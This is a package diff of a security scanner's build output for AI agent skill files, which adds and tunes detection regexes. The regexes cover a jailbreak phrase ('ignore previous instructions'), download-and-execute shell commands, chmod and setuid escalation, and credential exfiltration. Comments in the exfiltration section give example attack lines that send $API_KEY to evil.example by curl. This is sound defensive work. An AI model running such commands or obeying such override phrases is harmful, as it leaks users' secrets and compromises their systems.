{"version":3,"file":"SecurityScanner.scanners.js","sourceRoot":"","sources":["../../../../src/security/scanner/SecurityScanner.scanners.ts"],"names":[],"mappings":"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"}
|
|
@@ -4,7 +4,9 @@
|
|
|
4
4
|
* Pattern definitions for security scanning.
|
|
5
5
|
*/
|
|
6
6
|
export declare const DEFAULT_ALLOWED_DOMAINS: string[];
|
|
7
|
+
export declare const ENV_PATH_PATTERN: RegExp;
|
|
7
8
|
export declare const SENSITIVE_PATH_PATTERNS: RegExp[];
|
|
9
|
+
export declare const VALUE_GATED_KEYWORD_PATTERNS: ReadonlySet<RegExp>;
|
|
8
10
|
export declare const JAILBREAK_PATTERNS: RegExp[];
|
|
9
11
|
export declare const SUSPICIOUS_PATTERNS: RegExp[];
|
|
10
12
|
/**
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"patterns.d.ts","sourceRoot":"","sources":["../../../../src/security/scanner/patterns.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAGH,eAAO,MAAM,uBAAuB,UAanC,CAAA;
|
|
1
|
+
{"version":3,"file":"patterns.d.ts","sourceRoot":"","sources":["../../../../src/security/scanner/patterns.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAGH,eAAO,MAAM,uBAAuB,UAanC,CAAA;AA4BD,eAAO,MAAM,gBAAgB,QAAoE,CAAA;AAMjG,eAAO,MAAM,uBAAuB,UAsBnC,CAAA;AAID,eAAO,MAAM,4BAA4B,EAAE,WAAW,CAAC,MAAM,CAG3D,CAAA;AAGF,eAAO,MAAM,kBAAkB,UAkB9B,CAAA;AAGD,eAAO,MAAM,mBAAmB,UAY/B,CAAA;AAED;;;;;;;;;;;;;;;;;;;GAmBG;AACH,eAAO,MAAM,uBAAuB,UAmBnC,CAAA;AAGD,eAAO,MAAM,2BAA2B,UAavC,CAAA;AAGD,eAAO,MAAM,uBAAuB,UAenC,CAAA;AAGD,eAAO,MAAM,0BAA0B,UA2DtC,CAAA;AAGD,eAAO,MAAM,6BAA6B,UA8CzC,CAAA;AAED;;;;GAIG;AACH,eAAO,MAAM,yBAAyB,UAuBrC,CAAA;AAED;;;;;;;;;;;GAWG;AACH;;;;GAIG;AACH,eAAO,MAAM,YAAY,UAwBxB,CAAA;AAED,eAAO,MAAM,mBAAmB,UAwD/B,CAAA"}
|
|
@@ -23,8 +23,32 @@ export const DEFAULT_ALLOWED_DOMAINS = [
|
|
|
23
23
|
// to require assignment/path/file-extension context. Without this tuning,
|
|
24
24
|
// documentation keywords in SKILL.md frontmatter and prose (1Password integration
|
|
25
25
|
// guides, security-research skill domain vocabulary) tripped HIGH severity.
|
|
26
|
+
//
|
|
27
|
+
// SMI-5359 Wave 4 — FP-narrowing for two over-firing entries (severity policy lives
|
|
28
|
+
// in scanSensitivePaths so the array length / regression-guard baseline is unchanged):
|
|
29
|
+
// MF-1: bare /api[_-]?key/i & /auth[_-]?token/i fired HIGH on ANY substring —
|
|
30
|
+
// benign prose ("set your api_key in the dashboard"), `export API_KEY=$1`, and
|
|
31
|
+
// `apiKey: <YOUR_KEY>` placeholders. They are now VALUE-GATED: HIGH only when the
|
|
32
|
+
// line assigns a real (non-placeholder, sufficiently-entropic) secret. The
|
|
33
|
+
// value-BEARING leak is already caught at PII (PII_PATTERNS[0/2]); the
|
|
34
|
+
// credential-in-an-outbound-curl exfil is caught by DATA_EXFILTRATION_PATTERNS
|
|
35
|
+
// (the `$API_KEY`-in-a-fetched-URL pattern added below). See
|
|
36
|
+
// VALUE_GATED_KEYWORD_PATTERNS.
|
|
37
|
+
// MF-2: lone /\.env/i fired HIGH on every `.env` mention AND on the benign committed
|
|
38
|
+
// family (.envrc, .env.example/.sample/.template/.schema/.dist). ENV_PATH_PATTERN
|
|
39
|
+
// negative-lookaheads exclude that family; scanSensitivePaths downgrades a LONE
|
|
40
|
+
// `.env` to MEDIUM and keeps HIGH when it co-occurs with a read/exfil verb or
|
|
41
|
+
// shell pipe/redirect (`cat .env | curl ...`).
|
|
42
|
+
// MF-2: `.env` as a real env-file reference. Excludes `.envrc` (direnv config) and the
|
|
43
|
+
// committed placeholder family (.env.example/.sample/.template/.schema/.dist). The
|
|
44
|
+
// `(?![A-Za-z])` guard also drops the `.environment`/`.envision` English-word FP while
|
|
45
|
+
// still matching real variants like `.env`, `.env.local`, `.env.production`.
|
|
46
|
+
export const ENV_PATH_PATTERN = /\.env(?![A-Za-z])(?!\.(?:example|sample|template|schema|dist))/i;
|
|
47
|
+
// MF-1: bare credential keywords — value-gated in scanSensitivePaths, never standalone HIGH.
|
|
48
|
+
const API_KEY_KEYWORD = /api[_-]?key/i;
|
|
49
|
+
const AUTH_TOKEN_KEYWORD = /auth[_-]?token/i;
|
|
26
50
|
export const SENSITIVE_PATH_PATTERNS = [
|
|
27
|
-
|
|
51
|
+
ENV_PATH_PATTERN,
|
|
28
52
|
// Contextual credentials: filename or assignment, not bare prose
|
|
29
53
|
/credentials\.(?:json|ya?ml|env|toml|txt)/i,
|
|
30
54
|
/credentials\s*[:=]/i,
|
|
@@ -36,8 +60,8 @@ export const SENSITIVE_PATH_PATTERNS = [
|
|
|
36
60
|
/\.crt$/i,
|
|
37
61
|
// Contextual password: assignment or URL (postgres://user:pass@host) only
|
|
38
62
|
/password\s*[:=]/i,
|
|
39
|
-
|
|
40
|
-
|
|
63
|
+
API_KEY_KEYWORD,
|
|
64
|
+
AUTH_TOKEN_KEYWORD,
|
|
41
65
|
/~\/\.ssh/i,
|
|
42
66
|
/~\/\.aws/i,
|
|
43
67
|
/~\/\.config/i,
|
|
@@ -46,6 +70,12 @@ export const SENSITIVE_PATH_PATTERNS = [
|
|
|
46
70
|
// doesn't drop coverage of obvious sensitive references like /etc/passwd.
|
|
47
71
|
/\/etc\/(?:passwd|shadow|sudoers|hosts)\b/i,
|
|
48
72
|
];
|
|
73
|
+
// MF-1: the two bare-keyword patterns above emit HIGH only when accompanied by a real
|
|
74
|
+
// assigned secret value; scanSensitivePaths suppresses an otherwise-bare match.
|
|
75
|
+
export const VALUE_GATED_KEYWORD_PATTERNS = new Set([
|
|
76
|
+
API_KEY_KEYWORD,
|
|
77
|
+
AUTH_TOKEN_KEYWORD,
|
|
78
|
+
]);
|
|
49
79
|
// Jailbreak attempt patterns
|
|
50
80
|
export const JAILBREAK_PATTERNS = [
|
|
51
81
|
/ignore\s+(all\s+)?(previous|prior|above)\s+(instructions?|prompts?|rules?)/i,
|
|
@@ -101,17 +131,23 @@ export const SUSPICIOUS_PATTERNS = [
|
|
|
101
131
|
*/
|
|
102
132
|
export const CODE_EXECUTION_PATTERNS = [
|
|
103
133
|
// curl|wget <target> | [sudo] <interpreter> (fetch piped to a shell or scripting interpreter)
|
|
104
|
-
/(?:curl|wget)\b[^\n|]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,}\.[a-z]{2,})[^\n|]{0,150}?\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|python[23]?|node|ruby|perl|php)\b/i,
|
|
134
|
+
/(?:curl|wget)\b[^\n|]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,63}\.[a-z]{2,24})[^\n|]{0,150}?\|\s*(?:sudo\s+(?:-[A-Za-z]+\s+)?)?(?:(?:ba|z|da)?sh|python[23]?|node|ruby|perl|php|fish|bun|deno)\b/i,
|
|
105
135
|
// process substitution: bash/sh/zsh/source/. <(curl|wget <target> ...)
|
|
106
|
-
/(?:^|[\s;&])(?:source|\.|ba?sh|zsh|exec)\s+<\(\s*(?:curl|wget)\b[^\n)]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,}\.[a-z]{2,})/i,
|
|
136
|
+
/(?:^|[\s;&])(?:source|\.|ba?sh|zsh|exec)\s+<\(\s*(?:curl|wget)\b[^\n)]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,63}\.[a-z]{2,24})/i,
|
|
107
137
|
// command substitution into eval or `sh -c`: eval "$(curl <target>...)", bash -c "`wget <target>...`"
|
|
108
|
-
/(?:\beval\b|(?:ba|z)?sh\s+-c)\s+["']?[$`]\(?\s*(?:curl|wget)\b[^\n)]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,}\.[a-z]{2,})/i,
|
|
138
|
+
/(?:\beval\b|(?:ba|z)?sh\s+-c)\s+["']?[$`]\(?\s*(?:curl|wget)\b[^\n)]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,63}\.[a-z]{2,24})/i,
|
|
109
139
|
// PowerShell download-and-execute: iex(irm ...), Invoke-Expression(... DownloadString/Invoke-WebRequest)
|
|
110
140
|
/\b(?:iex|invoke-expression)\b[^\n]{0,100}?(?:\birm\b|\biwr\b|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)/i,
|
|
111
141
|
// PowerShell encoded command (base64 payload handed to the interpreter)
|
|
112
142
|
/\bpowershell\b[^\n]{0,60}?\s-e(?:nc|ncodedcommand)?\b\s*[A-Za-z0-9+/=]{16,}/i,
|
|
113
143
|
// decode-then-exec: ... base64 -d ... | <interpreter> (SMI-5359 retro NIT: da sink, matches the curl pattern)
|
|
114
|
-
/\bbase64\s+(?:-d|--decode|-D)\b[^\n|]{0,60}?\|\s*(?:(?:ba|z|da)?sh|python[23]?|node|ruby|perl|php)\b/i,
|
|
144
|
+
/\bbase64\s+(?:-d|--decode|-D)\b[^\n|]{0,60}?\|\s*(?:(?:ba|z|da)?sh|python[23]?|node|ruby|perl|php|fish|bun|deno)\b/i,
|
|
145
|
+
// SMI-5424 FN-1: chained / redirect download-then-execute (curl URL -o /tmp/x && bash /tmp/x)
|
|
146
|
+
/(?:curl|wget)\b[^\n]{0,150}?(?:https?:\/\/|\d{1,3}(?:\.\d{1,3}){3}|[\w-]{2,63}\.[a-z]{2,24})[^\n]{0,150}?(?:&&|;)\s*(?:sudo\s+(?:-[A-Za-z]+\s+)?)?(?:(?:ba|z|da)?sh|python[23]?|node|ruby|perl|php|fish|bun|deno)\b/i,
|
|
147
|
+
// SMI-5424 FN-2: npx executing a REMOTE source (URL or github:), never a local package (npx tsc is clean)
|
|
148
|
+
/\bnpx\s+(?:--yes\s+|-y\s+)?(?:https?:\/\/\S+|github:\S+)/i,
|
|
149
|
+
// SMI-5424 FN-4: node/python/deno/bun inline-eval (-e/-c) with a dangerous payload
|
|
150
|
+
/\b(?:node|python[23]?|deno|bun)\s+(?:-e|-c|--eval|--exec)\s+['"][^'"]{0,200}?(?:require\(|child_process|fetch\(|\bexec\b|eval\(|base64|urllib|os\.system|subprocess)/i,
|
|
115
151
|
];
|
|
116
152
|
// SMI-685: Social engineering attempt patterns
|
|
117
153
|
export const SOCIAL_ENGINEERING_PATTERNS = [
|
|
@@ -185,16 +221,48 @@ export const DATA_EXFILTRATION_PATTERNS = [
|
|
|
185
221
|
// "Never expose the password to Claude Code" (expose excluded: weak intent signal
|
|
186
222
|
// + negation-context FP in 1Password-style SKILL.md fixtures).
|
|
187
223
|
/(?:send|transmit|leak|dump|steal|extract)\s+[\w\s']{0,40}(?:passwords?|credentials?|secrets?)\b/i,
|
|
224
|
+
// SMI-5359 Wave 4 (MF-1 exfil preservation): an outbound curl/wget carrying a
|
|
225
|
+
// credential env-var INSIDE the fetched URL's query string
|
|
226
|
+
// (`curl https://evil.example/?k=$API_KEY`). This is the dedicated home for the
|
|
227
|
+
// credential-exfil signal that previously rode on the now-value-gated
|
|
228
|
+
// /api[_-]?key/i sensitive_path keyword — without it, narrowing MF-1 would drop a
|
|
229
|
+
// real exfil threat to a single non-blocking url:medium. Requires the verb AND an
|
|
230
|
+
// http(s) target AND a `?`-query AND a $KEY/$TOKEN/$SECRET/$PASS/$CRED var, all in
|
|
231
|
+
// the contiguous URL token — so a header-borne auth call
|
|
232
|
+
// (`curl -H "Authorization: Bearer $TOKEN" https://api.github.com`: no `?`-query,
|
|
233
|
+
// var outside the URL token) does NOT match. Bounded lazy-then-anchored quantifiers
|
|
234
|
+
// exclude the pipe/whitespace boundaries → ReDoS-safe.
|
|
235
|
+
/\b(?:curl|wget)\b[^\n]{0,150}?https?:\/\/[^\n\s?]{0,200}\?[^\n\s]{0,200}?\$\{?[A-Za-z0-9_]{0,40}(?:KEY|TOKEN|SECRET|PASS|CRED)/i,
|
|
236
|
+
// SMI-5359 Wave 4 (MF-1 exfil preservation, POST/form body): the GET-query pattern
|
|
237
|
+
// above misses a credential carried in a request BODY
|
|
238
|
+
// (`curl -d "key=$API_KEY" https://evil.example/collect`), the more common exfil
|
|
239
|
+
// channel. Matches curl/wget with a -d/--data*/-F/--form arg containing a
|
|
240
|
+
// $KEY/$TOKEN/$SECRET/$PASS/$CRED var. A header-borne auth call (`-H "Authorization:
|
|
241
|
+
// Bearer $TOKEN"`) uses neither flag, so it does NOT match. Bounded lazy quantifiers
|
|
242
|
+
// → ReDoS-safe.
|
|
243
|
+
/\b(?:curl|wget)\b[^\n]{0,200}?(?:-d|--data(?:-raw|-binary|-urlencode)?|-F|--form)\b[^\n]{0,100}?\$\{?[A-Za-z0-9_]{0,40}(?:KEY|TOKEN|SECRET|PASS|CRED)/i,
|
|
188
244
|
];
|
|
189
245
|
// SMI-685: Privilege escalation patterns
|
|
190
246
|
export const PRIVILEGE_ESCALATION_PATTERNS = [
|
|
191
247
|
/sudo\s+.*(-S|--stdin)/i, // sudo with password from stdin
|
|
192
248
|
/echo\s+.*\|\s*sudo/i, // Echo password to sudo
|
|
193
249
|
/sudo\s+-S/i,
|
|
194
|
-
|
|
195
|
-
|
|
196
|
-
|
|
197
|
-
|
|
250
|
+
// SMI-5424 PR2: standalone-critical chmod — genuine privilege threats that fire
|
|
251
|
+
// on their own. Owner-perm chmod (755/644/600/700…) is NOT here: it false-fired
|
|
252
|
+
// on benign `chmod 755 ./bin/cli` / `chmod 600 .env`; it is now a COMPOUND signal
|
|
253
|
+
// (scanChmodFetchCompound) that fires only co-located with a fetch/exec verb,
|
|
254
|
+
// preserving the curl|bash+chmod co-signal (escalateCodeExecution needs high/crit).
|
|
255
|
+
/\bchmod\s+[0-7]?[0-7][0-7][2367]\b/i, // world-writable (others-write bit set: …2/3/6/7)
|
|
256
|
+
/\bchmod\s+0?[2-7][0-7]{3}\b/i, // setuid/setgid octal (incl. leading-zero 04755/02755 + 3xxx/5xxx)
|
|
257
|
+
/\bchmod\s+[ugoa]*\+s\b/i, // setuid/setgid symbolic (u+s / g+s / +s)
|
|
258
|
+
// SMI-5428: world/others-writable symbolic chmod (o+w / a+w / go+w / a+rwx / o+rwx).
|
|
259
|
+
// The (?=[ugoa]*[oa]) lookahead requires `o` or `a` in the target set and [rwxX]*w
|
|
260
|
+
// requires a `w` perm — so owner/group-only writes (u+w, g+w) and non-write perms
|
|
261
|
+
// (u+x, a+x, o+r) do NOT match. Standalone-critical: a skill granting the world write
|
|
262
|
+
// access to a path is a genuine privilege threat on its own (mirrors the octal
|
|
263
|
+
// world-writable entry above for symbolic syntax). Single bounded char-class
|
|
264
|
+
// quantifiers → ReDoS-safe.
|
|
265
|
+
/\bchmod\s+(?=[ugoa]*[oa])[ugoa]*\+[rwxX]*w/i, // world/others-writable symbolic (o+w / a+w / go+w)
|
|
198
266
|
/\bchown\s+root/i,
|
|
199
267
|
/\bchgrp\s+root/i,
|
|
200
268
|
/visudo/i,
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"patterns.js","sourceRoot":"","sources":["../../../../src/security/scanner/patterns.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAEH,0BAA0B;AAC1B,MAAM,CAAC,MAAM,uBAAuB,GAAG;IACrC,YAAY;IACZ,uBAAuB;IACvB,2BAA2B;IAC3B,WAAW;IACX,WAAW;IACX,oBAAoB;IACpB,eAAe;IACf,WAAW;IACX,iBAAiB;IACjB,uBAAuB;IACvB,YAAY;IACZ,oBAAoB;CACrB,CAAA;AAED,+BAA+B;AAC/B,qFAAqF;AACrF,0EAA0E;AAC1E,kFAAkF;AAClF,4EAA4E;AAC5E,MAAM,CAAC,MAAM,uBAAuB,GAAG;IACrC,
|
|
1
|
+
